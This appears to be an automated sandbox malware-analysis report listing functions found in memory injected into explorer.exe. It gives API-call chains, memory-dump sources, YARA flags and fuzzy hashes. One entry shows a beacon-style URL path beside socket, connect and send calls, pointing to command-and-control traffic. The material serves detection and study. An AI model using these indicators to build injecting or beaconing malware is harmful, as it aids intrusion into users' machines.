                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1006321803-0
                                                                                                                                                                                                                        • Opcode ID: f7f0e950452672c33b53b7a7d6ae0d4df301492d08b3e6fd7bb59d6e7e239ab6
                                                                                                                                                                                                                        • Instruction ID: 6abf23018d9a990ba44cccaa833b7c598f590bf724c77d1f4ed04c4bc577a4c8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7f0e950452672c33b53b7a7d6ae0d4df301492d08b3e6fd7bb59d6e7e239ab6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F401BC21B15B4282EE089F6AB8443796366AB88FD0F0C903ADE1B07768EF38C141C714
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • malloc.LIBCMT ref: 0DED11AD
                                                                                                                                                                                                                          • Part of subcall function 0DEED4B1: _NMSG_WRITE.LIBCMT ref: 0DEED4EB
                                                                                                                                                                                                                          • Part of subcall function 0DEED4B1: _callnewh.LIBCMT ref: 0DEED51F
                                                                                                                                                                                                                          • Part of subcall function 0DEED4B1: _errno.LIBCMT ref: 0DEED52A
                                                                                                                                                                                                                          • Part of subcall function 0DEED4B1: _errno.LIBCMT ref: 0DEED535
                                                                                                                                                                                                                        • free.LIBCMT ref: 0DED1544
                                                                                                                                                                                                                        • free.LIBCMT ref: 0DED154C
                                                                                                                                                                                                                        • free.LIBCMT ref: 0DED1554
                                                                                                                                                                                                                        • free.LIBCMT ref: 0DED155D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692158037.000000000DED0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ded0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$_errno$_callnewhmalloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2761444284-0
                                                                                                                                                                                                                        • Opcode ID: 89003d18724c760acf33120327dc08f5968b530597684a6895f375dd43fdf9cc
                                                                                                                                                                                                                        • Instruction ID: b36f2a9f4c55e26e41882b26bcfbf5c97f00797fd723e9a59141c31261fe940f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89003d18724c760acf33120327dc08f5968b530597684a6895f375dd43fdf9cc
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29D1423061CB488FEB69EF28D8596AA77E1FB98305F10162EE44BD7250DF78D506CB81
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • malloc.LIBCMT ref: 082211AD
                                                                                                                                                                                                                          • Part of subcall function 0823D4B1: _NMSG_WRITE.LIBCMT ref: 0823D4EB
                                                                                                                                                                                                                          • Part of subcall function 0823D4B1: _callnewh.LIBCMT ref: 0823D51F
                                                                                                                                                                                                                          • Part of subcall function 0823D4B1: _errno.LIBCMT ref: 0823D52A
                                                                                                                                                                                                                          • Part of subcall function 0823D4B1: _errno.LIBCMT ref: 0823D535
                                                                                                                                                                                                                        • free.LIBCMT ref: 08221544
                                                                                                                                                                                                                        • free.LIBCMT ref: 0822154C
                                                                                                                                                                                                                        • free.LIBCMT ref: 08221554
                                                                                                                                                                                                                        • free.LIBCMT ref: 0822155D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2680336364.0000000008220000.00000040.00000001.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_8220000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$_errno$_callnewhmalloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2761444284-0
                                                                                                                                                                                                                        • Opcode ID: 89003d18724c760acf33120327dc08f5968b530597684a6895f375dd43fdf9cc
                                                                                                                                                                                                                        • Instruction ID: 4044cbba437d037ac694190a19df1962384e102813606170f2ee078bc363c641
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89003d18724c760acf33120327dc08f5968b530597684a6895f375dd43fdf9cc
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3D13331618B588FDB68EF28D8596AE77E1FB98305F10062EE44BC7250DF74E516CB81
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • malloc.LIBCMT ref: 0E0811AD
                                                                                                                                                                                                                          • Part of subcall function 0E09D4B1: _NMSG_WRITE.LIBCMT ref: 0E09D4EB
                                                                                                                                                                                                                          • Part of subcall function 0E09D4B1: _callnewh.LIBCMT ref: 0E09D51F
                                                                                                                                                                                                                          • Part of subcall function 0E09D4B1: _errno.LIBCMT ref: 0E09D52A
                                                                                                                                                                                                                          • Part of subcall function 0E09D4B1: _errno.LIBCMT ref: 0E09D535
                                                                                                                                                                                                                        • free.LIBCMT ref: 0E081544
                                                                                                                                                                                                                        • free.LIBCMT ref: 0E08154C
                                                                                                                                                                                                                        • free.LIBCMT ref: 0E081554
                                                                                                                                                                                                                        • free.LIBCMT ref: 0E08155D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692587166.000000000E080000.00000040.00000400.00020000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e080000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$_errno$_callnewhmalloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2761444284-0
                                                                                                                                                                                                                        • Opcode ID: 89003d18724c760acf33120327dc08f5968b530597684a6895f375dd43fdf9cc
                                                                                                                                                                                                                        • Instruction ID: e3e13bcefb5c18dca927967a4372d1f5f0cea00ae3d6562fe980966065cbd3f4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89003d18724c760acf33120327dc08f5968b530597684a6895f375dd43fdf9cc
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0FD13431658B488FDB68EF28D8596AE77E1FB98305F10062EE48BC7250DF74D906CB81
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 729c3b4835a6834bc6ca702b346004f04212394b198bebd1968db775b09b660a
                                                                                                                                                                                                                        • Instruction ID: 375e288e5b331deed33cec246ebd64f5d90b295931015d93c7a0a36507389802
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 729c3b4835a6834bc6ca702b346004f04212394b198bebd1968db775b09b660a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35B0128B88EBE02CD313493D2C028982F055043871B8C4345DAD0000D55000C4854330
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 7c307f67adb8aff98d3f095286b2b700dfcb55a183617c16c72d4ace8312b7d4
                                                                                                                                                                                                                        • Instruction ID: 038cc99b61fe1a58f79dc842e8ffe6d2d7c0790616e2838ebdfb41b054369831
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c307f67adb8aff98d3f095286b2b700dfcb55a183617c16c72d4ace8312b7d4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                        • Instruction ID: 33f440db8dcf76ed1806d7bd443262935e64228566635c654bb1f16f699d93a5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                        • Instruction ID: 33f440db8dcf76ed1806d7bd443262935e64228566635c654bb1f16f699d93a5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                        • Instruction ID: 33f440db8dcf76ed1806d7bd443262935e64228566635c654bb1f16f699d93a5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: memcpy$malloc$realloc$free$CriticalSectionlstrlen$EnterLeavewsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 812771569-0
                                                                                                                                                                                                                        • Opcode ID: 446faeafd06da1299cb99806716bd47ee0507f5573767720f34ae69a3c23ae9e
                                                                                                                                                                                                                        • Instruction ID: f457016a041dd9fdf9130579497d10c50768a9e4502133d5fc9edfba6555bee8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 446faeafd06da1299cb99806716bd47ee0507f5573767720f34ae69a3c23ae9e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7E149626057428BDB21DFAAE8943BA73A2F744B95F04D02ACB8B47B64DF7CD444CB50
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: memcpy$malloc$realloc$free$CriticalSectionlstrlen$EnterLeavewsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 812771569-0
                                                                                                                                                                                                                        • Opcode ID: 11e5b956b3368ed5495092f0787d9a908bc5de416d5a4e08dd7e195be530881e
                                                                                                                                                                                                                        • Instruction ID: 984a3b48d7cc9bb41893f3417fb14c6511eeca8e2abdbb8ea15273e4bea4c886
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11e5b956b3368ed5495092f0787d9a908bc5de416d5a4e08dd7e195be530881e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FDE18CB130A781C7DB24DB26E8947AE77A1FB48B85F410825CB8A57B54DF7CD884CB41
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: memcpy$malloc$realloc$free$CriticalSectionlstrlen$EnterLeavewsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 812771569-0
                                                                                                                                                                                                                        • Opcode ID: 11e5b956b3368ed5495092f0787d9a908bc5de416d5a4e08dd7e195be530881e
                                                                                                                                                                                                                        • Instruction ID: 8384fa1b82ddbe26dea9dc46862b6fa3de45e32464ece0080dd35836d22f1af1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11e5b956b3368ed5495092f0787d9a908bc5de416d5a4e08dd7e195be530881e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 21E12662605B428BDB709B26E89437A77A1FB84FC5F400139CF8A87B56DF7CE4468B40
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$CriticalSectionmemcpy$Leavemallocstrncmp$Enterlstrlenrealloc
                                                                                                                                                                                                                        • String ID: 2
                                                                                                                                                                                                                        • API String ID: 4124047334-450215437
                                                                                                                                                                                                                        • Opcode ID: c9d171b352920f4e7f850daaabd59ccca9f0d7deed6e5898ae2756d441c60d4c
                                                                                                                                                                                                                        • Instruction ID: e4c2859dab13d452e0b3a754628ff1c7b9bfa9dbedb8c21824a2d9c1b56bab97
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9d171b352920f4e7f850daaabd59ccca9f0d7deed6e5898ae2756d441c60d4c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73715564605B0285EA14ABABED943BA7362BB85BE1F44C43ACD0B87774EE3CC4458760
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$CriticalSectionmemcpy$Leavemallocstrncmp$Enterlstrlenrealloc
                                                                                                                                                                                                                        • String ID: 2
                                                                                                                                                                                                                        • API String ID: 4124047334-450215437
                                                                                                                                                                                                                        • Opcode ID: c949912b412b4ea7f5cdd3e04349eb3bba8bbdfecfb46dda596e31b717203312
                                                                                                                                                                                                                        • Instruction ID: de0d2366f5e3de4341f076c10be1201a6df15f422884e83d419f122af7076890
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c949912b412b4ea7f5cdd3e04349eb3bba8bbdfecfb46dda596e31b717203312
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03717DF0206B80C5EA18EF62F9947AA63A1BB89FD1F540865DD0A577A4DF3CC8C5C741
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$CriticalSectionmemcpy$Leavemallocstrncmp$Enterlstrlenrealloc
                                                                                                                                                                                                                        • String ID: 2
                                                                                                                                                                                                                        • API String ID: 4124047334-450215437
                                                                                                                                                                                                                        • Opcode ID: c949912b412b4ea7f5cdd3e04349eb3bba8bbdfecfb46dda596e31b717203312
                                                                                                                                                                                                                        • Instruction ID: 265178f9a483de787714528471edd553770716f219857641cc4d1d588fe4b348
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c949912b412b4ea7f5cdd3e04349eb3bba8bbdfecfb46dda596e31b717203312
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4714565605B0385EB24AF62ED9437A6BA1BF85FD1F840135CE0A8BB66DF3CD04AD740
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 0DFA8FE8
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0DFA8FF5
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0DFA902A
                                                                                                                                                                                                                          • Part of subcall function 0DFA9B30: GetWindowsDirectoryA.KERNEL32 ref: 0DFA9B7C
                                                                                                                                                                                                                          • Part of subcall function 0DFA9B30: GetVolumeInformationA.KERNEL32 ref: 0DFA9BC6
                                                                                                                                                                                                                          • Part of subcall function 0DFA9B30: wsprintfA.USER32 ref: 0DFA9C27
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0DFA904D
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFA905D
                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 0DFA90F4
                                                                                                                                                                                                                          • Part of subcall function 0DFA91C0: EnterCriticalSection.KERNEL32 ref: 0DFA91CB
                                                                                                                                                                                                                          • Part of subcall function 0DFA91C0: LeaveCriticalSection.KERNEL32 ref: 0DFA91FB
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: send.WS2_32 ref: 0DFA703C
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: recv.WS2_32 ref: 0DFA70A3
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcmpiA.KERNEL32 ref: 0DFA7103
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrlenA.KERNEL32 ref: 0DFA7127
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: StrStrA.SHLWAPI ref: 0DFA713F
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcmpiA.KERNEL32 ref: 0DFA715E
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: strtol.MSVCRT ref: 0DFA7176
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFA906D
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcpyA.KERNEL32 ref: 0DFA6E6E
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6E7F
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6E93
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6EA7
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6EB8
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6ECC
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6EEA
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: wsprintfA.USER32 ref: 0DFA6F02
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6F16
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6F2A
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6F66
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: WSAStartup.WS2_32 ref: 0DFA6F76
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: socket.WS2_32 ref: 0DFA6F92
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: gethostbyname.WS2_32 ref: 0DFA6FA9
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: memcpy.MSVCRT ref: 0DFA6FC9
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: htons.WS2_32 ref: 0DFA6FD8
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: connect.WS2_32 ref: 0DFA6FEF
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrlenA.KERNEL32 ref: 0DFA7005
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: send.WS2_32 ref: 0DFA701B
                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 0DFA910C
                                                                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 0DFA911A
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$CriticalSection$lstrcpylstrlen$EnterLeavelstrcmpimemcpysendwsprintf$DirectoryInformationInitializeStartupVolumeWindowsconnectgethostbynamehtonsrecvsocketstrtol
                                                                                                                                                                                                                        • String ID: /VzCAHn.php?2F409E82DCA61388941053$2F409E82DCA61388941053
                                                                                                                                                                                                                        • API String ID: 1973528353-3252209160
                                                                                                                                                                                                                        • Opcode ID: e534138d032882a20b8057ea1649a8c508f8bec9dde78e52e480184a9a0b3790
                                                                                                                                                                                                                        • Instruction ID: e4eb503f5185601f7947bf2dfa7ce003ef175f4c2151767763c4bd05f8c3f137
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e534138d032882a20b8057ea1649a8c508f8bec9dde78e52e480184a9a0b3790
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F6512675604B4695EB10DFAAF88437A73A5F788B84F408026DA8E87B34DF78C549CB60
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4099253644-0
                                                                                                                                                                                                                        • Opcode ID: e9f5f2c6d9d52227c1224fb5eb956fae150d2f2d84a34203266234652f144675
                                                                                                                                                                                                                        • Instruction ID: 520105b571c3097510efecb2dd2ac8dcac807dda6b02397bfbc0b5d6810df137
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9f5f2c6d9d52227c1224fb5eb956fae150d2f2d84a34203266234652f144675
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE312F25A05B0695FE14DBDAED903B93325BB45B74F09C226C92F062B2CF7CC4A58A31
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
